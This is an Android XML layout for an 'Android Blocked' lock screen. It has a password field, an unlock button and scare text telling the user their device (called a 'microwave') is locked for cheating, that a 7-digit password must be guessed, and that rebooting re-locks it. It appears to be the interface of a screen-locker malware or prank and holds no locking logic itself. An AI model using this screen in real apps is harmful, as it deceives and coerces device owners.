<LinearLayout
	xmlns:android="http://schemas.android.com/apk/res/android"
	xmlns:app="http://schemas.android.com/apk/res-auto"
	xmlns:tools="http://schemas.android.com/tools"
	android:layout_width="match_parent"
	android:layout_height="match_parent"
	android:orientation="vertical">
	<LinearLayout
		android:id="@+id/linear1"
		android:layout_width="200dp"
		android:layout_height="350dp"
		android:padding="8dp"
		android:background="@drawable/bird"
		android:orientation="vertical"
		android:translationX="50.0dp"
		android:translationY="150.0dp">
		<TextView
			android:id="@+id/textview1"
			android:layout_width="wrap_content"
			android:layout_height="wrap_content"
			android:padding="8dp"
			android:text="Android Blocked"
			android:textSize="20sp"
			android:textColor="#2196F3" />
		<ScrollView
			android:id="@+id/vscroll1"
			android:layout_width="match_parent"
			android:layout_height="150dp"
			android:padding="8dp">
			<TextView
				android:id="@+id/textview2"
				android:layout_width="wrap_content"
				android:layout_height="wrap_content"
				android:padding="8dp"
				android:text="You’ve played too much, Cheater. Your microwave is blocked due to cheating. You shouldn’t download cheats from websites. Your microwave is locked, and the banner is set to auto-load.\nTry removing the cover and battery from your microwave, then reinsert the battery. Believe me, you need to know what to do to avoid getting caught.\nDO NOT DOWNLOAD THIS STUFF. If you unlock your microwave using cheats from websites, it might become a brick. The password consists of 7 digits—try to guess it.\nWarning! If you reboot your phone it will block the microwave again\nWarning! If you have spent attempts and rebooted the phone, then the attempts will be the same ones that you lost"
				android:textSize="12sp"
				android:textColor="#2196F3" />
		</ScrollView>
		<EditText
			android:id="@+id/edittext1"
			android:layout_width="wrap_content"
			android:layout_height="wrap_content"
			android:padding="8dp"
			android:textSize="12sp"
			android:textColor="#000000"
			android:hint="Password Here"
			android:textColorHint="#2196F3"
			android:translationX="30.0dp" />
		<Button
			android:id="@+id/button1"
			android:layout_width="wrap_content"
			android:layout_height="wrap_content"
			android:padding="8dp"
			android:text="UnlockMicrowave"
			android:textSize="16sp"
			android:textColor="#000000"
			android:translationX="15.0dp" />
		<TextView
			android:id="@+id/textview3"
			android:layout_width="wrap_content"
			android:layout_height="wrap_content"
			android:padding="8dp"
			android:textSize="12sp"
			android:textColor="#2196F3" />
	</LinearLayout>
</LinearLayout>
